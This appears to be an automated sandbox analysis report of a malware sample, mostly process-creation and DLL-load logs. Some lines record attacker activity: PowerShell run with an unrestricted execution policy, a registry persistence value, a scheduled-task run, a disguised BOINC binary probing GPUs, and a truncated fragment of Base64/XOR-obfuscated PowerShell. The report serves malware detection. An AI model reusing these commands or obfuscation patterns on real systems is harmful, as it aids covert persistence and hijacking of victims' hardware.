Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater"
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: sensapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: sensapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: sensapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: nvcuda.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: aticalrt64.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: amdcalrt64.dll
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeSection loaded: opencl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
Source: Google Drive.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 527.zipStatic file information: File size 2409320 > 1048576
Source: Binary string: webauthn.pdb source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: wshbth.pdbGCTL source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wshbth.pdb source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: netprofm.pdb source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdbUGP source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdbUGP source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\boinc\boinc\win_build\Build\x64\Release\boinc_exe.pdb source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($nudjq3c8k7x6gr4) $ikqwbe9y521ufg6= $blxt5f9u6djvrap.GetBytes("xn2fp8hcregw") $hsevi6ytd7f4pl5 = $37hbifps61xuja2 $nur53p4bqax1c9l = $(for ($z0ugfp6bl7o9ykc = 0; $z0ugfp6bl7o9y
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: gmpopenh264.dll.tmp.3.drStatic PE information: section name: .rodata
Source: boinc.exe.24.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB31993FE push 8B485E31h; iretd 20_2_00007FFEB3199406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB31922E5 push eax; retf 20_2_00007FFEB31922F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB31960F5 push cs; retf 20_2_00007FFEB319610F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB3404747 push ds; retf 20_2_00007FFEB340474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB3530BA0 push ebx; retf 20_2_00007FFEB3530BAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB35308D9 push ebx; ret 20_2_00007FFEB35308DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB37A61D5 pushad ; ret 20_2_00007FFEB37A61DD
